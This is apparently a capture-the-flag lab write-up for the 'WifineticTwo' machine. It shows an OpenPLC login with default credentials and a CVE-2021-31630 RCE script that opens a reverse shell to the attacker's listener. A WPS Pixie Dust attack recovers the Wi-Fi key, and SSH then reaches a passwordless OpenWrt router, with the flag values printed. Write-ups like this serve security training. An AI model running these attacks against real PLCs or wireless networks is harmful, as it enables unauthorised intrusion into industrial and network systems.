WifineticTwo
Recon
HTTP (8080)
OpenPLC
We have no users so we can't exactly go somewhere.. Using default credentials: openplc:openplc we are able to login!
OpenPLC creds:
openplc:openplc
Authenticated RCE
CVE-2021-31630OpenPLC WebServer v3 - Authenticated RCE
└─$ py cve_2021_31630.py -u openplc -p openplc http://10.10.11.7:8080/ -lh 10.10.14.37 -lp 4444
------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout : 20 secs
[>] LHOST : 10.10.14.37
[>] LPORT : 4444
[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!Reverse Shell
We are root, which is odd... something isn't right.
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.7:38966.
root@attica03:/opt/PLC/OpenPLC_v3/webserver# whoami
root
root@attica03:/opt/PLC/OpenPLC_v3/webserver# id
uid=0(root) gid=0(root) groups=0(root)User.txt
root user contains user.txt meaning this root user is not the one we need.
root@attica03:~# cat user.txt
6e1ccfe76f3fdb33d106b3640c211f4bPrivilege Escalation
Just like the box name suggests we are dealing with a WiFi. Check network interfaces:
root@attica03:~# ip -c address show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if20: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 00:16:3e:79:d1:d2 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.3.4/24 brd 10.0.3.255 scope global eth0
valid_lft forever preferred_lft forever
inet 10.0.3.237/24 metric 100 brd 10.0.3.255 scope global secondary dynamic eth0
valid_lft 3249sec preferred_lft 3249sec
inet6 fe80::216:3eff:fe79:d1d2/64 scope link
valid_lft forever preferred_lft forever
7: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
root@attica03:~# iwconfig
eth0 no wireless extensions.
lo no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:onWe have Wi-Fi related command to utilize, such as iw - show / manipulate wireless devices and their configuration
root@attica03:~# iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
last seen: 9207.708s [boottime]
TSF: 1722101672346840 usec (19931d, 17:34:32)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: plcrouter
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Supported operating classes:
* current operating class: 81
Extended capabilities:
* Extended Channel Switching
* SSID List
* Operating Mode Notification
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
* Manufacturer:
* Model:
* Model Number:
* Serial Number:
* Primary Device Type: 0-00000000-0
* Device name:
* Config methods: Label, Display, Keypad
* Version2: 2.0WPS is supported meaning it could be bruteforced.
Pixie Dust Attack
OneShot performs Pixie Dust attack without having to switch to monitor mode.
root@attica03:/dev/shm# python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
# BSSID ESSID Sec. PWR WSC device name WSC model
1) 02:00:00:00:01:00 plcrouter WPA2 -30
Select target (press Enter to refresh): 1 # <-- Input
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'Note: Python version of attack is used as it's much simpler then compiling C
Connect to plcrouter
plcrouterGenerate config file for connection and then use generated config to connect to router.
root@attica03:/dev/shm# wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' | tee plcrouter.conf
network={
ssid="plcrouter"
#psk="NoWWEDoKnowWhaTisReal123!"
psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
root@attica03:/dev/shm# wpa_supplicant -B -c plcrouter.conf -i wlan0
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
root@attica01:/dev/shm# ip -brief a s
lo UNKNOWN 127.0.0.1/8 ::1/128
eth0@if18 UP 10.0.3.2/24 10.0.3.52/24 metric 100 fe80::216:3eff:fefc:910c/64
wlan0 UP fe80::ff:fe00:200/64
root@attica01:/dev/shm# dhclient -v
Internet Systems Consortium DHCP Client 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/wlan0/02:00:00:00:02:00
Sending on LPF/wlan0/02:00:00:00:02:00
Listening on LPF/eth0/00:16:3e:fc:91:0c
Sending on LPF/eth0/00:16:3e:fc:91:0c
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3 (xid=0x725d3820)
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3 (xid=0x1aeee019)
DHCPOFFER of 10.0.3.52 from 10.0.3.1
DHCPREQUEST for 10.0.3.52 on eth0 to 255.255.255.255 port 67 (xid=0x19e0ee1a)
DHCPACK of 10.0.3.52 from 10.0.3.1 (xid=0x1aeee019)
RTNETLINK answers: File exists
bound to 10.0.3.52 -- renewal in 1611 seconds.
root@attica01:/dev/shm# ip -brief a s
lo UNKNOWN 127.0.0.1/8 ::1/128
eth0@if18 UP 10.0.3.2/24 10.0.3.52/24 metric 100 fe80::216:3eff:fefc:910c/64
wlan0 UP 192.168.1.84/24 fe80::ff:fe00:200/64
root@attica01:/dev/shm# arp
Address HWtype HWaddress Flags Mask Iface
attica01 (incomplete) eth0
192.168.1.1 ether 02:00:00:00:01:00 C wlan0
10.0.3.1 ether 00:16:3e:00:00:00 C eth0Use dhclient to get an IP and using arp check network ip.
root@attica01:/dev/shm# ssh root@192.168.1.1
ssh root@192.168.1.1
BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# ls
root.txt shell
Root.txt
root@ap:~# cat root.txt
a086fa5a9ebffe09a83f4fd434d3fb2bLast updated